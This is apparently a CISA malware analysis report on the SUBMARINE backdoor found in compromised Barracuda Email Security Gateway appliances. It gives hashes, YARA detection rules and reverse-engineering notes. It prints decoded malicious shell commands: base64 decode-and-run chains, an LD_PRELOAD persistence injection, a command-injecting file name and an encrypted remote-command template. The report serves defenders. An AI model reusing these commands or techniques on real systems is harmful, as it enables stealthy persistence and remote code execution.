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CISA obtained seven malware samples related to a novel backdoor CISA has named SUBMARINE. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting certain versions – of Barracuda Email Security Gateway (ESG).

SUBMARINE is a novel persistent backdoor that lives in a Structured Query Language (SQL) database on the ESG appliance. SUBMARINE comprises multiple artifacts that, in a multi-step process, enable execution with root privileges, persistence, command and control, and cleanup. In addition to SUBMARINE, CISA obtained associated Multipurpose Internet Mail Extensions (MIME) attachment files from the victim. These files contained the contents of the compromised SQL database, which included sensitive information.

For information about related malware, specifically information on the initial exploit payload and other backdoors, see CISA Alert: CISA Releases Malware Analysis Reports on Barracuda Backdoors.

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AR23-209A PDF
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For a downloadable copy of IOCs associated with this MAR in JSON format, see:

AR23-209A JSON
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Submitted Files (5)

6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0 (r)

81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab (

8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239 (machineecho_-n_Y2htb2QgK3ggL3J…)

b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43 (sedO4CWZ9)

cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a (smtpctl)

Additional Files (2)

2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5 (config.TRG)

bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a (





Name config.TRG
Size 5465 bytes
Type ASCII text, with very long lines
MD5 d03e1f112f0c784a39003e0b3992ad80
SHA1 447369281ba26b7a6da4f659aa31026605aa3c6f
SHA256 2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5
SHA512 aead33a656f647d58da0a7f5240eb8cd7c0121c9ea33ae6504687b5faf21779e67b659a93987392033ea8ae2aae239e432444dcddad52f2a8665add7265902f6
ssdeep 96:CjXDCc0wSWbCZgFHwlJc8UpsmdpanoP5Mc8wWuMdHABIz2mN:CjXDN0wSWQp08UpsmFm4mhCm
Entropy 6.062477
Malware Result unknown

No matches found.

YARA Rules
  • rule CISA_10454006_06 : SUBMARINE trojan backdoor cleans_traces_of_infection hides_artifacts installs_other_components
           Author = “CISA Code & Media Analysis”
           Incident = “10454006”
           Date = “2023-07-11”
           Last_Modified = “20230727_1200”
           Actor = “n/a”
           Family = “SUBMARINE”
           Capabilities = “cleans-traces-of-infection hides-artifacts installs-other-components”
           Malware_Type = “trojan backdoor”
           Tool_Type = “unknown”
           Description = “Detects SUBMARINE SQL trigger samples”
           SHA256_1 = “2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5”
           $s1 = { 54 52 49 47 47 45 52 }
           $s2 = { 43 52 45 41 54 45 }
           $s3 = { 53 45 4c 45 43 54 20 22 65 63 68 6f 20 2d 6e }
           $s4 = { 62 61 73 65 36 34 20 2d 64 20 7c 20 73 68 }
           $s5 = { 72 6f 6f 74 }
           $s6 = { 53 45 54 }
           $s7 = { 45 4e 44 20 49 46 3b }
           $s8 = { 48 34 73 49 41 41 41 41 41 41 41 41 41 2b 30 61 43 33 42 55 }
           $s9 = { 2f 76 61 72 2f 74 6d 70 2f 72 }
           $s10 = { 2f 72 6f 6f 74 2f 6d 61 63 68 69 6e 65 }
       filesize < 250KB and all of them
ssdeep Matches

No matches found.


The file ‘config.TRG’ is a SUBMARINE artifact. The presence of the filename, ‘config.TRG’ does not indicate that the ESG is infected. Instead, it is the actual contents of the file that determine whether it is infected or not. The contents of ‘config.TRG’ is contained within the SQL database file called ‘config.snapshot’ and the MIME attachments. Presence of the contents of the file ‘config.TRG’ within the SQL database is indicative of an infection of SUBMARINE.

The file contains a malicious SQL trigger called ‘cuda_trigger’ (Figure 1). This SQL trigger is set to run as root on the local host before a row is deleted from the database. After the trigger parameters are met, two actions occur. First a compressed, base64 encoded blob containing 2 files is written into a file called ‘r’ in the ‘/var/tmp’ directory (Figure 2). Second, a base64 encoded command is executed (Figure 3).

–Begin Base64 Decoded Command–
cat /var/tmp/r | base64 -d -i | tar -zx -C /var/tmp
nohup bash /var/tmp/ >/dev/null 2>&1 &
rm -f /root/machine` *chmod +x /root/mac*
sh /root/mach*`*
–End Base64 Decoded Command–

The commands will decode the base64 encoded string and execute the decoded result as a shell command. The commands will pass the contents of the file ‘r’ to be decoded then decompressed with the ‘tar’ command. Then, the file ‘’ executes with the ‘nohup’ parameter. The ‘nohup’ parameter allows the process launched on the shell to continue executing even if the shell is closed. The ‘BSMTP_ID’ is passed and all errors redirected and discarded to the ‘/dev/null’ directory. Lastly, the contents of the ‘/root/machine’ directory will be removed, permissions are set to executable, and shell scripts containing a name with the string ‘mach*’ in the root directory are executed.

Figure 1

Figure 1. – The malicious SQL trigger called ‘cuda_trigger’.

Figure 2

Figure 2. – A small snippet of the base64 blob being written into the file ‘r’.

Figure 3

Figure 3. – A small snippet of the base64 encoded command found after ‘r’ is written.




Name machineecho_-n_Y2htb2QgK3ggL3Jvb3QvbWFjKgpzaCAvcm9vdC9tYWNoKlxgKgoK___base64_-d__sh
Size 202 bytes
Type ASCII text
MD5 c5c93ba36e079892c1123fe9dffd660f
SHA1 e1df0da64a895ff00fc27a41898aa221b5b7d926
SHA256 8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239
SHA512 a07e79b99e02fa52ab5ab75fc2d989d35d4b360a57fdf0ec5569f445fe1820d26915adbd4f30e3a9126e5cabcde9ca840779039393c39e5838618f06db47a4cc
ssdeep 3:jT81L9RUjD+rlczyX837QTa0NDO9Z8giofQHcQMHL6wF8ufIhW0TaT7ZsNvn:c1JRID+pc2XS7Ga0yYgC3GLX8Q0TaRsv
Entropy 5.481015
Malware Result unknown

No matches found.

YARA Rules
  • rule CISA_10454006_07 : SUBMARINE trojan dropper exploit_kit evades_av hides_executing_code hides_artifacts exploitation
           Author = “CISA Code & Media Analysis”
           Incident = “10454006”
           Date = “2023-07-11”
           Last_Modified = “20230711_1830”
           Actor = “n/a”
           Family = “SUBMARINE”
           Capabilities = “evades-av hides-executing-code hides-artifacts”
           Malware_Type = “trojan dropper exploit-kit”
           Tool_Type = “exploitation”
           Description = “Detects ESG FileName exploit samples”
           SHA256 = “8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239”
           $s1 = { 7c 20 62 61 73 65 36 34 20 2d 64 20 7c 20 73 68 }
           $s2 = { 65 63 68 6f 20 2d 6e }
           $s3 = { 59 32 46 30 49 43 39 32 59 58 49 76 64 47 31 77 4c 33 49 67 66 43 42 69 59 58 4e 6c 4e 6a 51 67 4c 57 51 67 4c 57 6b 67 66 43 42 30 59 58 49 67 }
           filesize < 1KB and all of them
ssdeep Matches

No matches found.


The file ‘machineecho -n Y2htb2QgK3ggL3Jvb3QvbWFjKgpzaCAvcm9vdC9tYWNoKlxgKgoK _ base64 -d _sh`_’ is a SUBMARINE artifact. The file is a shell script identified in the ‘/root’ directory and contains base64 encoded commands. The name of the file is designed to exploit a vulnerability on the target environment where the base64 string within the file name will be executed on the Linux shell.

–Begin Base64 Decoded Name/Command–
chmod +x /root/mac*
sh /root/mach*`*
–End Base64 Decoded Name/Command–

The above commands will change the permissions of the directory, ‘/root/mac*’, to executable.

The file contains a series of operations, such as decoding a base64 encoded string and executing the decoded result as a shell command. The decoded base64 string represents a series of commands that will be executed by the shell.

~Begin Base64 Decoded Command~

cat /var/tmp/r | base64 -d -i | tar -zx -C /var/tmp
nohup bash /var/tmp/    >/dev/null 2>&1 &
rm -f /root/machine`*

~End Base64 Decoded Command~

This command is identical to the decoded base64 commands found in the SQL trigger identified in the file ‘config.snapshot’.




Name r
Size 4857 bytes
Type ASCII text, with very long lines
MD5 03e07c538a5e0e7906af803a83c97a1e
SHA1 600452b1cff8d99e41093be8b68f62e7c85f23d7
SHA256 6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0
SHA512 a4a6257dd6f859ae58de3b46879926ce99e3e3edb16db37dc80da4975f5a2866f4cd722233b98c9553e319e61661cae98d535ccb26d8c9709cf6f2efa56b9b3f
ssdeep 96:pjXDCc0wSWbCZgFHwlJc8UpsmdpanoP5Mc8wWuMdHABIZ:pjXDN0wSWQp08UpsmFm4mhCC
Entropy 5.988140
Malware Result unknown

No matches found.

YARA Rules
  • rule CISA_10454006_02 : SUBMARINE trojan backdoor exploitation hides_artifacts prevents_artifact_access
           Author = “CISA Code & Media Analysis”
           Incident = “10454006”
           Date = “2023-06-29”
           Last_Modified = “20230711_1500”
           Actor = “n/a”
           Family = “SUBMARINE”
           Capabilities = “hides-artifacts prevents-artifact-access”
           Malware_Type = “trojan backdoor”
           Tool_Type = “exploitation”
           Description = “Detects encoded GZIP archive samples”
           SHA256_1 = “6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0”
           $s1 = { 48 34 73 49 41 41 41 41 41 41 41 41 41 2b 30 61 }
           $s2 = { 44 44 44 41 67 50 39 2f 2b 43 38 47 70 2f 36 63 41 46 41 41 41 41 3d 3d 0a}
           $s3 = { 37 56 4d 70 56 58 4f 37 2b 6d 4c 39 78 2b 50 59 }
           filesize < 6KB and 3 of them and (math.entropy(0,filesize) > 5.8)
ssdeep Matches

No matches found.

6dd8de093e… Contains 81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab
6dd8de093e… Contains bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a

The file ‘r’ is a SUBMARINE artifact. The file is a Base64 encoded GNU Zip (GZIP) archive. When the ‘cat /*/*/r | base64 -d -i | tar -zx -C /*/*’ Linux Shell command is applied to ‘r’, it decompresses two files. The aforementioned Linux Shell command is contained in ‘config.snapshot’ as a Base64 encoded SQL trigger.

–Begin Decompressed Files–
1. (bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a)
2. (81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab)
–End Decompressed Files–




Size 473 bytes
Type POSIX shell script, ASCII text executable
MD5 c2e577c71d591999ad5c581e49343093
SHA1 d446e06e40053214788aa1bad17b6d3587a2a370
SHA256 bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a
SHA512 ffe528fcb448424b1f811a4b9068402971bf2705ad64e556071a062cd89d74d371d3ef41afca38450b7d8457611246a6ba35478dfc83e997950d2f85c8dac80f
ssdeep 12:avOAsp2yBXGTVjnJAIFw/J7G80ZWkbUErPzg:azsphBXSFZFwgLWkXg
Entropy 5.323635
Malware Result unknown

No matches found.

YARA Rules
  • rule CISA_10454006_03 : SUBMARINE trojan backdoor loader rootkit virus controls_local_machine hides_artifacts infects_files installs_other_components remote_access exploitation information_gathering
           Author = “CISA Code & Media Analysis”
           Incident = “10454006”
           Date = “2023-07-03”
           Last_Modified = “20230711_1500”
           Actor = “n/a”
           Family = “SUBMARINE”
           Capabilities = “controls-local-machine hides-artifacts infects-files installs-other-components”
           Malware_Type = “trojan backdoor loader rootkit virus”
           Tool_Type = “remote-access exploitation information-gathering”
           Description = “Detects SUBMARINE launcher script samples”
           SHA256_1 = “bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a”
           $s1 = { 73 65 64 20 2d 69 }
           $s2 = { 4c 44 5f 50 52 45 4c 4f 41 44 3d }
           $s3 = { 6c 69 62 75 74 69 6c 2e 73 6f }
           $s4 = { 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c }
           $s5 = { 2f 62 6f 6f 74 2f 6f 73 5f 74 6f 6f 6c 73 }
           $s6 = { 72 6d 20 2d 72 66 }
           $s7 = { 62 61 73 65 36 34 20 2d 64 }
           $s8 = { 7c 73 68 }
           $s9 = { 72 65 73 74 61 72 74 }
           $s10 = { 2f 64 65 76 2f 6e 75 6c 6c }
           $s11 = { 23 21 20 2f 62 69 6e 2f 73 68 }
           $s12 = { 62 61 73 65 36 34 }
           filesize < 2KB and all of them
  • rule CISA_10454006_04 : SUBMARINE trojan backdoor hides_artifacts hides_executing_code infects_files installs_other_components remote_access exploitation
           Author = “CISA Code & Media Analysis”
           Incident = “10454006”
           Date = “2023-07-05”
           Last_Modified = “20230711_1500”
           Actor = “n/a”
           Family = “SUBMARINE”
           Capabilities = “hides-artifacts hides-executing-code infects-files installs-other-components”
           Malware_Type = “trojan backdoor”
           Tool_Type = “remote-access exploitation”
           Description = “Detects SUBMARINE launcher script samples”
           SHA256_1 = “b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43”
           $s1 = { 73 6c 65 65 70 }
           $s2 = { 7c 62 61 73 65 36 34 20 2d 64 }
           $s3 = { 4c 44 5f 50 52 45 4c 4f 41 44 }
           $s4 = { 2f 68 6f 6d 65 2f 70 72 6f 64 75 63 74 2f 63 6f 64 65 2f 66 69 72 6d 77 61 72 65 2f 63 75 72 72 65 6e 74 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c 20 72 65 73 74 61 72 74 }
           $s5 = { 65 63 68 6f 20 2d 6e 20 27 }
           $s6 = { 73 68 }
           $s7 = { 23 21 20 2f 62 69 6e 2f 73 68 }
           filesize < 2KB and 6 of them
ssdeep Matches

No matches found.

bbbae0455f… Contained_Within 6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0

The file ‘’ is a SUBMARINE loader. The file is a shell script located at within the archive ‘r’ in the ‘/var/tmp’ directory. The purpose of ‘’ is to perform a combination of file manipulation, script generation and execution (Figure 4). There are 4 variables within ‘’:

–Begin Variable List–

B=`echo -n “sed -i “s|exec|BSMTP_ID=$B1 LD_PRELOAD=$A exec|g” $S”|base64 -w0`

–End Variable List–

The script begins by moving SUBMARINE from the ‘/var/tmp/’ directory to the ‘/boot/os_tools/’ directory for persistence.

The variable “B” is declared as a ‘sed’ command that replaces all occurrences of the string ‘exec’ with `BSMTP_ID=$1 LD_PRELOAD=/boot/os_tools/ exec /home/product/code/firmware/current/sbin/smtpctl’. This ‘sed’ command is then base64 encoded.

A new file called ‘hw-set’ is created in the ‘/boot/os_tools/’ directory. A line is appended to the ‘smtpctl’ file which checks for the string ‘LD_PRELOAD’. If the string is not found, the base64 encoded string stored in variable “B” is decoded and executed as a shell command and ‘smtpctl’ is restarted.

The ‘chmod’ command is used to set executable permissions for ‘hw-set’.

The ‘sed’ command is used with a ‘-i’ flag to modify the file ‘update_version’ within the ‘/boot/os_tools/’ directory with an appended string to line 44. The appended string, “system(‘/boot/os_tools/hw-set 2>&1 >/dev/null &’);”, will run the file ‘hw-set’ in the background and redirect both output and errors to ‘dev/null’ whenever the file ‘update_version’ is executed.

The file ‘hw-set’ is executed and the ‘sed’ command with the ‘-i’ flag is used to insert the string ‘sleep 2m’ on line 1 to set a sleep duration of 2 minutes.

Finally, all files and directories within ‘/var/tmp/’ directory are removed.

Figure 4

Figure 4. – The contents of the file, ‘’




Name hw-set
Name sedO4CWZ9
Size 341 bytes
Type POSIX shell script, ASCII text executable, with very long lines
MD5 b860198feca7398bc79a8ec69afc65ed
SHA1 c4c64da81995044ea3447b8ffd07689382b7487b
SHA256 b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43
SHA512 0d4b66dbeb88e8c9fb970572c033ab84b8273734277edb139cdc04560a0547d192a6762fc8ed8138eb43f7d05df6c36aa6bc1987eda4a4b6075e9059e71ef358
ssdeep 6:JkKgPxJooRKGKBNvd/UntDEcQwj7bPfNcgUBZqcL0FcXfFtC2i+RKGKBNvSv:alZJoospwtIclTNcRDnv7CJ+spSv
Entropy 5.713942
Malware Result unknown

No matches found.

YARA Rules
  • rule CISA_10454006_04 : SUBMARINE trojan backdoor hides_artifacts hides_executing_code infects_files installs_other_components remote_access exploitation
           Author = “CISA Code & Media Analysis”
           Incident = “10454006”
           Date = “2023-07-05”
           Last_Modified = “20230711_1500”
           Actor = “n/a”
           Family = “SUBMARINE”
           Capabilities = “hides-artifacts hides-executing-code infects-files installs-other-components”
           Malware_Type = “trojan backdoor”
           Tool_Type = “remote-access exploitation”
           Description = “Detects SUBMARINE launcher script samples”
           SHA256_1 = “b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43”
           $s1 = { 73 6c 65 65 70 }
           $s2 = { 7c 62 61 73 65 36 34 20 2d 64 }
           $s3 = { 4c 44 5f 50 52 45 4c 4f 41 44 }
           $s4 = { 2f 68 6f 6d 65 2f 70 72 6f 64 75 63 74 2f 63 6f 64 65 2f 66 69 72 6d 77 61 72 65 2f 63 75 72 72 65 6e 74 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c 20 72 65 73 74 61 72 74 }
           $s5 = { 65 63 68 6f 20 2d 6e 20 27 }
           $s6 = { 73 68 }
           $s7 = { 23 21 20 2f 62 69 6e 2f 73 68 }
           filesize < 2KB and 6 of them
ssdeep Matches

No matches found.


The file ‘hw-set’ is a SUBMARINE artifact. The file is a shell script located in the ‘/boot/os_tools/’ directory and contains shell commands as well as a base64 encoded string (Figure 5). The shell script is set to sleep for 2 minutes prior to execution. The ‘grep’ command checks if the string ‘LD_PRELOAD’ is contained within the ‘smtpctl’ file located at ‘/home/product/code/firmware/current/sbin/’. The exclamation point (!) prepending the script is used to check for success or failure of the ‘grep’ command. If the string ‘LD_PRELOAD’ is not identified, a base64 encoded ‘sed’ command is used to modify the ‘smtpctl’ file (Figure 6).

Figure 5

Figure 5. – The contents of the shell script in the file ‘hw-set’.

Figure 6

Figure 6. – The decoded base64 string contained in the shell script of the file ‘hw-set’.




Name smtpctl
Size 3759 bytes
Type POSIX shell script, ASCII text executable
MD5 35a432e40da597c7ab63ff16b09d19d8
SHA1 b798b881b89526051ee5d50f24239b3a952c9724
SHA256 cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a
SHA512 af6aa47f44e604a60930f122ebd47d6c1b83c756b005d79ade8af147bfbfab40f16ba91e32021d65b18b21e06911476fb5d03f050850c8300d1e7d7a3e61c36b
ssdeep 48:t7c4VFuL2/zkanTvNpofcgBnY5NBFTGc5FjJWgkFBhhkQ1jtbA5lwmNdBITf3K3M:xcOko1iyGc6FzKAjDTvssgRaI7Q
Entropy 5.178501
Malware Result unknown

No matches found.

YARA Rules
  • rule CISA_10454006_05 : SUBMARINE trojan backdoor remote_access_trojan compromises_data_integrity cleans_traces_of_infection hides_artifacts installs_other_components remote_access exploitation
           Author = “CISA Code & Media Analysis”
           Incident = “10454006”
           Date = “2023-07-05”
           Last_Modified = “20230711_1500”
           Actor = “n/a”
           Family = “SUBMARINE”
           Capabilities = “compromises-data-integrity cleans-traces-of-infection hides-artifacts installs-other-components”
           Malware_Type = “trojan backdoor remote-access-trojan”
           Tool_Type = “remote-access exploitation”
           Description = “Detects SUBMARINE launcher script samples”
           SHA256_1 = “cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a”
           $s1 = { 4c 44 5f 50 52 45 4c 4f 41 44 }
           $s2 = { 23 21 20 2f 62 69 6e 2f 73 68 }
           $s3 = { 4c 44 5f 50 52 45 4c 4f 41 44 3d 2f 62 6f 6f 74 2f 6f 73 5f 74 6f 6f 6c 73 2f 6c 69 62 75 74 69 6c 2e 73 6f 20 65 78 65 63 }
           $s4 = { 3e 2f 64 65 76 2f 6e 75 6c 6c 20 32 3e 26 31 }
           $s5 = { 62 73 6d 74 70 64 20 63 6f 6e 74 72 6f 6c 20 73 63 72 69 70 74 }
           $s6 = { 42 53 4d 54 50 44 5f 50 49 44 }
           $s7 = { 2f 72 65 6c 6f 61 64 2f 72 65 73 74 61 72 74 }
           filesize < 6KB and 6 of them
ssdeep Matches

No matches found.


The file ‘smtpctl’ is a SUBMARINE loader. The file is a maliciously modified shell script used to remove mail files in 2 directories as well as load SUBMARINE as a shared library for the Batched Simple Mail Transfer Protocol (BSMTP) daemon.

~Begin File Removal Commands~
rm -f /mail/scan/body*
rm -f /mail/tmp/mimeattach.*
~End File Removal Commands~

Appended malicious code at the bottom of ‘’ sets the BSMTP_ID and SUBMARINE is preloaded as a shared library from the ‘/boot/os_tools’ directory. It then executes the BSMTP daemon. If the BSMTPD_PID variable is set, debug mode is enabled. If the BSMTPD_PID variable is not set, execution continues without enabling debug mode. Additionally, any instances of the string ‘reload’ in the command are replaced with ‘restart’ and all errors are redirected to ‘/dev/null’ (Figure 7).

Figure 7

Figure 7. – The appended malicious code loading SUBMARINE as the shared library for the BSMTP daemon. The BSMTP_ID value will be unique per device.




Name update_version
Size 9396 bytes
Type ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
MD5 b745626b36b841ed03eddfb08e6bb061
SHA1 cb20b167795db258b307ddee91ded87a9e7562d0
SHA256 81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab
SHA512 d6b9dfc9b784ca76386cbbf2c75c7e0ad3ac45e4420a838bc21b1464d07208f46901d7a0c8fbeca90303ce48720d7fd60b76d25cfebf5ea5b385e6b9db10ed98
ssdeep 96:dVdsadO5BT/aucX3Qa/c2D1UKDUzW1MuBFQC0NysEuSobXoWhP:yadO5B71cX3Qgc2uKD+aMLC01EuSo
Entropy 3.466134
Malware Result unknown
Path /boot/os_tools/
Path /boot/os_tools/update_version
Path /var/tmp/

No matches found.

YARA Rules
  • rule CISA_10454006_01 : SUBMARINE trojan backdoor remote_access_trojan remote_access information_gathering exploitation determines_c2_server controls_local_machine compromises_data_integrity
           Author = “CISA Code & Media Analysis”
           Incident = “10452108”
           Date = “2023-06-29”
           Last_Modified = “20230711_1500”
           Actor = “n/a”
           Family = “SUBMARINE”
           Capabilities = “determines-c2-server controls-local-machine compromises-data-integrity”
           Malware_Type = “trojan backdoor remote-access-trojan”
           Tool_Type = “remote-access information-gathering exploitation”
           Description = “Detects SUBMARINE Barracuda backdoor samples”
           SHA256_1 = “81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab”
           $s1 = { 32 35 30 2d 6d 61 69 6c 32 2e 65 63 63 65 6e 74 72 69 63 2e 64 75 63 6b }
           $s2 = { 6f 70 65 6e 73 73 6c 20 61 65 73 2d 32 35 36 }
           $s3 = { 65 63 68 6f 20 2d 6e 20 27 25 73 27 20 7c 20 62 61 73 65 36 34 20 2d 64 }
           $s4 = { 2d 69 76 }
           $s5 = { 48 65 6c 6c 6f 20 25 73 20 5b 25 73 5d 2c 20 70 6c 65 61 73 65 64 20 74 6f 20 6d 65 65 74 20 79 6f 75 }
           $s6 = { e8 47 fa ff }
           $s7 = { 63 6f 6d 6d 61 6e 64 }
           $s8 = { 2d 69 76 20 36 39 38 32 32 62 36 63 }
           $s9 = { 73 65 6e 64 }
           $s10 = { 73 6f 63 6B 65 74 }
           $s11 = { 63 6f 6e 6e 65 63 74 }
           filesize < 15KB and 8 of them
ssdeep Matches

No matches found.

81cf3b162a… Contained_Within 6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0

The file ‘’ is the SUBMARINE payload. ‘’ is preloaded into the BSMTP daemon, the Linux executable responsible for receiving emails, and processing Simple Mail Transfer Protocol (SMTP) reply messages. Linux Shared Object Preloading is analogous to Dynamic-Link Library (DLL) side loading and DLL injection in the Windows OS.

This file is preloaded using the ‘LD_PRELOAD’ parameter, applied to ‘bsmtpd’, the BSMTP daemon executable. The preload parameter is added to two configuration files, files that control the behavior of ‘bsmtpd.’ When the configuration files restart the daemon, ‘’ is loaded into its process memory, giving it the same privileges and access as ‘bsmtpd.’

The malware obtains the BSMTP_ID environment variable from the infected system. The BSMTP_ID has the capacity to be used as a port for malicious traffic. (Figure 8). The process this shared object file is running in, ‘bsmtpd’, is duplicated and launched using the ‘fork’ Linux function (Figure 9). The malware opens a connection to on the victim machine it is running on (Figure 10). The ‘recv’ function is called after the connection is opened, showing that the malware has the capacity to obtain information from the context/environment its executed on.

Figure 11, Pane 1, shows configuration settings for the BSMTP daemon, that allows any email traffic for the address range of 127/8 and multiple actions including ‘ehlo.’ Pane 2 shows the malware intaking data, and loading the ‘ehlo’ action into memory.

Figure 12, Pane 1, shows the malware, in conjunction with ‘snprintf_chk’, printing the string ‘echo -n ‘%s’ | base64 -d | openssl aes-256-cbc -d -K 66833b26%d -iv 69822b6c%d 2>/dev/null | sh’, to the Linux shell. The string is a command that accepts input ‘%s’, decodes it with Base64, decrypts it with AES, pipes errors to std_out and executes it on the target with the ‘sh’ bash command and ‘system’ Linux function. Lastly, the malware has the capacity to print the SMTP string, ‘ Hello %s [%s], pleased to meet you’ . Therefore, given this information, the malware has the capacity to accept encoded and encrypted inputs from ‘bsmtpd’, execute them, and print a message.

Figure 8

Figure 8. – Depicts the Linux function ‘getenv’ “BSMTP_ID” and setting the variable named “SRC_PORT”.

Figure 9

Figure 9. – Depicts the Linux function ‘fork.’

Figure 10

Figure 10. – Depicts the initialization of a connection using the Berkeley Sockets API.

Figure 11

Figure 11. – Pane 1 shows configuration settings for the BSMTP daemon, not in the malware. Pane 2 shows part of that configuration in the malware.

Figure 12

Figure 12. – Pane 1 shows the Linux functions ‘snprintf_chk’ and ‘system.’ Pane 2 shows configuration settings, for the BSMTP daemon.

Relationship Summary

6dd8de093e… Contains 81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab
6dd8de093e… Contains bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a
bbbae0455f… Contained_Within 6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0
81cf3b162a… Contained_Within 6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0


CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL:

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at


Mandiant contributed to this report.